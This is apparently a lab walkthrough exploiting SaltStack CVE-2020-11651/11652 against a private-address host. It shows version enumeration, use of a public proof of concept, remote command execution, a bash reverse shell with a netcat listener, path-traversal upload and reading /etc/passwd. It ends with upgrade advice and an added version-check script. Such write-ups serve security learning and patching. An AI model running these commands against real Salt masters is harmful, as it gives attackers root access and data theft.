The Salt system is a Python-based, open-source remote execution framework for configuration management, automation, provisioning, and orchestration.

Running commands on remote systems is the core function of Salt. Salt can execute multiple commands across thousands of systems in seconds with a single execution.

https://saltproject.io/

https://docs.saltproject.io/salt/user-guide/en/latest/topics/overview.html

https://docs.saltproject.io/en/latest/topics/about_salt_project.html#about-salt

CVE-2020-11651

An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.

CVE-2020-11652

An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.

Affected Products

  • SaltStack Salt 2019.2.3
  • SaltStack Salt 3000.1
  • Cisco Modeling Labs Corporate Edition (CML)
  • Cisco TelePresence IX5000 Series
  • Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE)

Enumeration

1. This vulnerability is present in versions before 3000.1. We will enumerate this service. First, I noticed an API site exposed:

  • http://192.168.71.62:8000/

2. In order to examine the version, I ran a curl command and sent an HTTP request to check the response header. I noticed "X-Upstream: salt-api/3000-1".

  • curl -v http://192.168.71.62:8000/

Exploitation

1. Knowing this API is SaltStack, we can proceed to look for exploits. I found this one that worked really well.

2. We will download the exploit and install the required library (salt):

  • git clone https://github.com/jasperla/CVE-2020-11651-poc.git
  • sudo pip3 install salt
  • cd CVE-2020-11651-poc
  • ls

3. Now we execute the exploit.py file with the help option:

  • python3 exploit.py -h

4. Now we run the program as a test. If we get the "root key", it is working without issues:

  • python3 exploit.py --master 192.168.71.62

5. Now I will run a test command: I'll run a ping command and capture it with tcpdump (this will only execute on the master; if you need to execute on all the minion servers, use --exec-all).

Packet Capture

  • sudo tcpdump -i tun0

Command execution

  • python3 exploit.py --master 192.168.71.62 --exec "ping -c 4 192.168.49.71"

Output in packet capture

6. At this point we know that we can execute commands and have connectivity back to our local machine. Now I will start a listener and execute a bash reverse shell.

Listener

  • nc -lvp 4505

Reverse Shell

  • python3 exploit.py --master 192.168.71.62 --exec "bash -i >& /dev/tcp/192.168.49.71/4505 0>&1"

Final result (reverse shell)

  • whoami && date && hostname

Optional

1. We can upload files and read them back to verify:

  • echo "Vry4n was here" > sample.txt
  • python3 exploit.py --master 192.168.71.62 --upload-src sample.txt --upload-dest ../../../../../../../../tmp/sample.txt
  • python3 exploit.py --master 192.168.71.62 -r "/tmp/sample.txt"

2. We can also read files using -r:

  • python3 exploit.py --master 192.168.71.62 -r "/etc/passwd"

Remedy

Upgrade to the latest version of Salt (2019.2.4, 3000.2 or later), available from the SaltStack website.
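To confirm the upgrade actually landed on every master, the X-Upstream header that salt-api returned during enumeration above can be checked against the fixed releases named here. The script below is an added example, not part of this write-up or the Salt project: it parses that header (both the dotted form and the dashed "3000-1" form seen above), flags versions before 2019.2.4 or 3000 before 3000.2, and runs offline on a constructed inventory; the host names and the fetch_upstream_header helper are assumptions.

```python
import re
import urllib.request

# Fixed releases per the advisory: 2019.2.4 closes the 2019.2 line, 3000.2 the 3000 line.
# "Before 2019.2.4" also covers older lines such as 2018.3; "3000 before 3000.2" is the
# other affected range. Releases after the fix (3001 and later) are not flagged.
FIXED_2019 = (2019, 2, 4)
FIXED_3000 = (3000, 2)

def parse_salt_version(header_value):
    """Extract the Salt version from an X-Upstream header value.
    Accepts 'salt-api/2019.2.3' and the dashed form 'salt-api/3000-1' (read as 3000.1).
    Returns a tuple of ints, or None when the header is not a salt-api header."""
    m = re.search(r"salt-api/(\d+(?:[.\-]\d+)*)", header_value)
    if not m:
        return None
    return tuple(int(p) for p in re.split(r"[.\-]", m.group(1)))

def is_vulnerable(version):
    """True when the version tuple falls inside either affected range."""
    if version[0] == 3000:
        return version < FIXED_3000
    return version < FIXED_2019  # 3001+ compare greater than (2019, 2, 4), so not flagged

def triage(headers_by_host):
    """Map {host: X-Upstream value} to 'vulnerable', 'fixed' or 'unknown'."""
    out = {}
    for host, hdr in headers_by_host.items():
        v = parse_salt_version(hdr)
        out[host] = "unknown" if v is None else ("vulnerable" if is_vulnerable(v) else "fixed")
    return out

def fetch_upstream_header(url, timeout=5):
    """Hypothetical helper: request a salt-api URL you administer and return its
    X-Upstream header ('' if absent). Not used by the offline checks above."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.headers.get("X-Upstream", "")

# Constructed sample inventory (hypothetical hosts and headers) so the check runs offline.
SAMPLE_HEADERS = {
    "master-a": "salt-api/3000-1",     # the header observed in the walkthrough above
    "master-b": "salt-api/2019.2.4",   # patched 2019.2 line
    "master-c": "salt-api/3001",       # release after the fix
    "master-d": "nginx/1.18.0",        # not salt-api at all
}

if __name__ == "__main__":
    for host, status in triage(SAMPLE_HEADERS).items():
        print(f"{host}: {status}")
```

A header reading "fixed" only proves the version string; an absent X-Upstream header still warrants checking the package version on the master itself.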

Resources

https://exchange.xforce.ibmcloud.com/vulnerabilities/181316

https://exchange.xforce.ibmcloud.com/vulnerabilities/181317

https://github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst

https://www.exploit-db.com/exploits/48421

https://docs.saltproject.io/en/latest/topics/releases/2019.2.4.html

https://packetstormsecurity.com/files/157560

https://github.com/dozernz/cve-2020-11651

https://github.com/jasperla/CVE-2020-11651-poc

https://github.com/rossengeorgiev/salt-security-backports